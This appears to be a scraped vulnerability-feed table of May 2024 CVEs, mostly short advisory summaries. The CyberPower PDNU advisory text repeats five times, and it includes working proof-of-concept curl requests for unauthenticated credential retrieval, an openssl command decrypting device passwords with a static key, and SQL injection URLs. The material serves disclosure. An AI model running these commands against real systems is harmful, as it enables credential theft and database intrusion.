Tenable (Nessus) [TOP 30] |
CVES |
TIME |
TITLE |
URL |
97091980c5e1b8458e4e6fa2fc74838e |
CVE-2024-34360 |
2024-05-10 00:00:00 |
Nodes can publish ATXs which reference the incorrect previous ATX of the Smesher that created the ATX. ATXs are expected to form a single chain from the newest to the first ATX ever published by an identity. Allowing Smeshers to reference an earlier (but not the latest) ATX as previous breaks this protocol rule and can serve as an attack vector where Nodes are rewarded for holding their PoST data for less than one epoch but still being eligible for rewards. |
详情 |
f14b094a1f9177dc64e84fdbe5968b5c |
CVE-2024-34349 |
2024-05-10 00:00:00 |
There is a possibility to execute javascript code in the Admin panel. In order to perform an XSS attack input a script into Name field in which of the resources: Taxons, Products, Product Options or Product Variants. The code will be executed while using an autocomplete field with one of the listed entities in the Admin Panel. Also for the taxons in the category tree on the product form. |
详情 |
903af0a69e5d47ff38f36d634b501944 |
CVE-2024-32964 |
2024-05-10 00:00:00 |
SSRF ,All users will be impacted. |
详情 |
a27d8e91cfe2d5d574808728ad8d7ea1 |
CVE-2024-32739 |
2024-05-09 14:39:13 |
CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"255.255.255.0","gateway":" \"192.168.1.1\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU. We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","2.2.7.0","","192.168.1.123","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","255.255.255.0", "192.168.1.1" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} |
详情 |
7b1bbc2dad37d3de2fd8dd27bc70a727 |
CVE-2024-32738 |
2024-05-09 14:39:13 |
CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"255.255.255.0","gateway":" \"192.168.1.1\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU. We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","2.2.7.0","","192.168.1.123","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","255.255.255.0", "192.168.1.1" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} |
详情 |
6e9f94d522f92f12b163aaa3088901da |
CVE-2024-32737 |
2024-05-09 14:39:13 |
CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"255.255.255.0","gateway":" \"192.168.1.1\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU. We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","2.2.7.0","","192.168.1.123","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","255.255.255.0", "192.168.1.1" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} |
详情 |
f486f5821b787845892a6e39c1db5123 |
CVE-2024-32736 |
2024-05-09 14:39:13 |
CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"255.255.255.0","gateway":" \"192.168.1.1\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU. We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","2.2.7.0","","192.168.1.123","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","255.255.255.0", "192.168.1.1" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} |
详情 |
f606bb9dae89374af144dd7feb6599fe |
CVE-2024-32735 |
2024-05-09 14:39:13 |
CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"255.255.255.0","gateway":" \"192.168.1.1\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU. We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"192.168.1.123","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","2.2.7.0","","192.168.1.123","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","255.255.255.0", "192.168.1.1" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} |
详情 |
8eb2479f89c57f088e48ef780615db3c |
CVE-2024-2454 |
2024-05-09 01:38:36 |
Uncontrolled Resource Consumption in GitLab |
详情 |
35d0cf7a7877afdadfe9ffe99cf8f999 |
CVE-2024-2651 |
2024-05-09 01:38:31 |
Uncontrolled Resource Consumption in GitLab |
详情 |
6fbd157bffa789486496b54333363332 |
CVE-2024-4701 |
2024-05-09 00:00:00 |
Any Genie OSS users running their own instance and relying on the filesystem to store file attachments submitted to the Genie application may be impacted. Using this technique, it is possible to write a file with any user-specified filename and file contents to any location on the file system that the Java process has write access - potentially leading to remote code execution (RCE).Genie users who do not store these attachments locally on the underlying file system are not vulnerable to this issue. |
详情 |
fbf57e564fb972b301dd5245a6d8720c |
CVE-2024-4671 |
2024-05-09 00:00:00 |
Use after free in Visuals. |
详情 |
5fe3ba590ed718fd37e5b734ea76b5b5 |
CVE-2024-4597 |
2024-05-09 00:00:00 |
Gitlab reports:ReDoS in branch search when using wildcardsReDoS in markdown render pipelineRedos on Discord integrationsRedos on Google Chat IntegrationDenial of Service Attack via Pin MenuDoS by filtering tags and branches via the APIMR approval via CSRF in SAML SSOBanned user from groups can read issues updates via the apiRequire confirmation before linking JWT identityView confidential issues title and description of any public project via exportSSRF via Github importer |
详情 |
4e4f5b5b3037c532293b87ea24301229 |
CVE-2024-4539 |
2024-05-09 00:00:00 |
Gitlab reports:ReDoS in branch search when using wildcardsReDoS in markdown render pipelineRedos on Discord integrationsRedos on Google Chat IntegrationDenial of Service Attack via Pin MenuDoS by filtering tags and branches via the APIMR approval via CSRF in SAML SSOBanned user from groups can read issues updates via the apiRequire confirmation before linking JWT identityView confidential issues title and description of any public project via exportSSRF via Github importer |
详情 |
6fa77327930c2f5eeca0b0a56dde033c |
CVE-2024-3976 |
2024-05-09 00:00:00 |
Gitlab reports:ReDoS in branch search when using wildcardsReDoS in markdown render pipelineRedos on Discord integrationsRedos on Google Chat IntegrationDenial of Service Attack via Pin MenuDoS by filtering tags and branches via the APIMR approval via CSRF in SAML SSOBanned user from groups can read issues updates via the apiRequire confirmation before linking JWT identityView confidential issues title and description of any public project via exportSSRF via Github importer |
详情 |
c3e2b6b243e34573d0b81c24d1e300fc |
CVE-2024-34257 |
2024-05-08 17:15:07 |
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges. |
详情 |
b647ebcf3cc84cf575fbd0004a2eb179 |
CVE-2024-34244 |
2024-05-08 17:15:07 |
